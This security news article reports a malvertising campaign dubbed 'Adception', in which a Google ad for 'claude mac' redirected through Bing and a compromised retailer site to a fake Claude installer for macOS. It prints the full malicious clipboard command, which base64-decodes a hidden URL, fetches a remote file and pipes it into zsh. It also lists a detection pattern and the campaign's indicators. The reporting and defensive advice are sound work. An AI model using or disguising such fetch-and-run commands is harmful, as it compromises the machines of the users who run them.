Push calls the technique "Adception." It's a good illustration of where malvertising is heading. Each hop in the chain is a domain people tend to trust, and the malicious page only loads if you arrive by the exact path the attackers planned.
What Push Security found
According to Push, the attack began with a Google search ad for "claude mac" whose destination was a Bing search result, which passed the victim through a compromised retail website to a fake Claude installer. The company says the name is a joke: a crafty redirect and cloaking technique that we're (unseriously) referring to as "Adception".
The ad did not use a lookalike domain. Searching Google for "claude mac" returned a sponsored result whose listed domain was bing.com, not a Claude lookalike or anything resembling Anthropic. Push points out that Google's ad review approved a destination that was simply another search engine, and the malicious payload only appeared if you reached the end of the chain through this specific path.
BleepingComputer independently reported the campaign on October 9, 2026. Its account matches Push's on the main points: a Google ad, a hop through Bing, a compromised WordPress site belonging to a South American retailer, and a fake Claude download page for macOS users.
The redirect chain, step by step
Push recorded four network requests when the ad was clicked:
| Stage | Request | HTTP status | Role |
|---|---|---|---|
| 1 | google.com/aclk?... | 302 | Google's ad-click redirect |
| 2 | bing.com/ck/a?...&u=a1... | 200 | Bing click-tracking redirect, forwarding via JavaScript |
| 3 | Compromised retailer "about us" page | 302 | Sends qualifying visitors on to the lure |
| 4 | claude-desk-code[.]com | 200 | Fake Claude download page |
Push explains the Bing part in a companion analysis: bing.com/ck/a is the redirect Bing puts behind every result on its own search pages, so it can log clicks before sending people on. The destination is base64-encoded in the u parameter, after an a1 prefix, and Bing forwards the visitor with a short JavaScript page rather than an HTTP redirect. That's why stage 2 returns a 200 instead of a 302. It also means the browser reaches the next hop with a bing.com referrer, and the attackers' cloaking depends on that.
The third hop is a real business. Push says the Bing link forwards the browser to the "about us" page of a legitimate South American homeopathy retailer, homeopatiaalemana[.]com. That site appears to have been compromised: visitors arriving through this chain get a 302 to claude-desk-code[.]com.
Push also found a timestamp in the Bing URL that decodes to October 5, 2026. The researchers think that's probably when Bing generated the link. It does not confirm when the campaign started, and nothing published so far says how long the ad ran.
Section summary: the ad shows Bing, Bing forwards to a legitimate but compromised site, and that site forwards to the lure. A filter or reviewer that checks only the first URL sees nothing suspicious.
Two layers of cloaking
The chain also hides the payload from scanners and researchers:
- Gate one (server side): the compromised WordPress site redirects only when it sees a Bing referrer and certain browser headers.
- Gate two (client side): the fake Claude page uses JavaScript to read
document.referrer. Visitors who didn't come from Google or Bing are sent to/404.html.
So typing the lure URL directly gets you a 404. Push's analysis says a benign page is served when accessing from the incorrect redirect path. Automated scanners that fetch URLs cold therefore see nothing. Push also noticed that reaching the compromised site from Bing search served the malicious page too. It thinks that was probably unintended and that the real targets were Google Search users.
The installer that shows one command and copies another
The landing page copies Anthropic's styling and offers a one-line Terminal install for macOS. It displays Anthropic's real command:
curl -fsSL [!/bin/bash](https://claude.ai/install.sh) | bash
The Copy button puts something else on the clipboard. Push published the substituted command, with the malicious host defanged:
echo "Downloading Claude: hxxps://claude[.]ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9sYWtlLTkwLmNvbS9jdXJsL2luaGd1cDlhL2E5MGZrYnFkZzhkMG11czY0b2g4ZHcuZGF0" | openssl base64 -d -A) | zsh
Here's what it does when pasted:
- It prints a message saying Claude is downloading from claude.ai, so the Terminal output looks normal.
- It Base64-decodes a hidden URL pointing to
lake-90[.]com. - It uses
curlto quietly fetch a.datfile from that server. - It pipes the file straight into
zsh, the default macOS shell, for execution.
The victim sees the genuine Claude URL on the web page and again in the Terminal, while a different script runs. Neither Push nor BleepingComputer has identified the final payload, so it's unknown what malware, if any, gets installed. There's no reported victim count or confirmed infection.
Push links several domains to the same ClickFix toolkit, which it tracks internally as AcSig. The name comes from the HMAC-signed headers the kit requires before it serves the malicious command. The domains share the same macOS command, payload URL structure and installer interface.
Why Windows users and Microsoft admins should care
The lure targeted Mac users, but the trusted redirect being abused belongs to Microsoft, and Claude-themed ClickFix campaigns have regularly hit Windows too.
- Earlier campaigns included Windows payloads. Trend Micro documented a fake Claude Code page delivered through Google Ads, where on Windows, executing the command causes the browser or shell to invoke mshta.exe against the remote payload URL. Bitdefender reported that in a similar campaign, the fake page instructed people to install Claude Code using terminal commands for macOS and Windows.
- Bing's ad platform has been abused as well. BleepingComputer reported earlier this year that a malvertising campaign on the Bing search service is pushing a fake Claude desktop app installer hosted on a legitimate Claude.ai domain to deliver the SectopRAT malware, and that at least 29 organizations were compromised between July 21-22, according to Huntress research.
- Search is the main way these lures reach people. In earlier InstallFix research, Push said 4 in 5 ClickFix lures we intercept are accessed from search engines.
What's new this time is how the attack hides. Push says Bing's click-tracking redirect had appeared before in phishing emails and QR codes, but the company found no earlier public reporting of it being used as a search ad's destination.
What to do about it
For individual users (Windows or Mac):
- Don't trust an ad because of its domain. A sponsored result showing bing.com, google.com or another familiar name can still forward you somewhere hostile.
- Skip search ads when downloading software. Type the vendor's address yourself or use a bookmark.
- Be suspicious of Copy buttons. If a page asks you to paste a command into Terminal, PowerShell or the Run dialog, paste it into a plain text editor first and read it. Base64 strings,
openssl base64 -d,mshta, or anything piped into a shell that isn't the vendor's own domain should make you stop. - Remember that Terminal output can lie. This command prints a legitimate-looking message while running something else.
Push hasn't published a cleanup procedure for anyone who ran the command, and the payload is unknown. If you pasted it, the safe assumption (based on general incident-response practice, not campaign-specific guidance) is that the machine is compromised. Isolate it, change credentials from a different device, and bring in your security team.
For administrators:
- Don't rely on URL reputation and sandbox detonation alone. This chain starts on reputable domains and returns a 404 to anyone arriving directly.
- Watch process behavior on endpoints. 7AI's research on an earlier Claude-themed campaign suggested detection logic built on process.command_line MATCHES '|.base64.-d.|.bash'-style patterns: decode-and-pipe commands run under Terminal. Expand that to cover
zsh. On Windows, the equivalent warning sign is PowerShell or Explorer spawningmshta.exewith a remote URL. - Use the indicators, but expect them to expire. Push's list includes Google ad campaign ID
24303361122. It also lists the lure domainsclaude-desk-code[.]com,ksmgakajgpsals.pages[.]dev,rapid-craft567[.]com,too.clawddddd[.]com,fine-byte2[.]com,fairpoint29[.]com,turbowave45[.]comandcli-desktop[.]com, the redirect pagehomeopatiaalemana[.]com/quienes-somos/, and the payload path onlake-90[.]com. Push itself warns that short-lived indicators have limited value because attackers rotate infrastructure quickly. - Make it easy to get AI tools legitimately. People searching "claude mac" usually just want the app. An approved software catalog or company portal removes the reason to search.
The bigger picture
Push sells browser security, and its write-up promotes its own detection, so keep that in mind. Even so, BleepingComputer's report backs up the main technical details. The underlying problem doesn't depend on any one vendor: Google's review approved a Bing destination, and Bing's redirect forwarded visitors to a compromised site.
Neither company has said whether it is changing anything. Ad reviewers might start treating other search engines' click-tracking URLs as destinations to inspect more closely, but nobody has announced that.
Until something changes, the practical rule is simple: if a page wants you to paste a command into a shell, check exactly what you copied before you run it.
References
- Hackers abuse Google Ads, Bing redirects to push Claude ClickFix attacks BleepingComputer · 2026-10-09T16:31:37-04:00
- Windows and macOS Malware Spreads via Fake “Claude Code” Google Ads bitdefender.com
- Fake Claude app promoted by Bing ads pushes SectopRAT malware bleepingcomputer.com